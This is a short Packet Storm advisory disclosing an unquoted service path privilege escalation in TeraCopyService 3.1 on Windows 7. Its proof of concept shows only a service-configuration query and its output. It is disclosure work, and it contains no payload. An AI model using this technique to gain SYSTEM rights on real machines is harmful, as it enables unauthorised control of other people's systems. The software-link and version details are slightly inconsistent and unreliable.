TeraCopyService version 3.1 suffers from an unquoted service path privilege escalation vulnerability.
321b6ef50286abd6f8073f83165a62147eb7531f364b581b90ed2538a48521ea# Exploit Title: TeraCopyService 3.1 - Unquoted Service Path Privilege Escalation
# Date of Discovery: August 31 2017
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Codesector
# Vendor Homepage: http://www.codesector.com/
# Software Link: TOVA 8.2-202 - http://www.codesector.com/teracopy
# Affected Versions: <3.1 confirmed, possibly later versions
# Tested on: Windows 7
# Category: local
# Vulnerability type: Local Privilege Escalation
# Description:
Teracopy installs a service ("TeraCopyService") with an unquoted service path running with SYSTEM
privileges.
This allows any non-privileged local user to execute arbitrary code with SYSTEM privileges.
# Proof Of Concept:
C:\Users\potato> sc qc TeraCopyService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TeraCopyService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\TeraCopy\TeraCopyService.exe
LOAD_ORDER_GROUP : System Reserved
TAG : 0
DISPLAY_NAME : TeraCopy Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed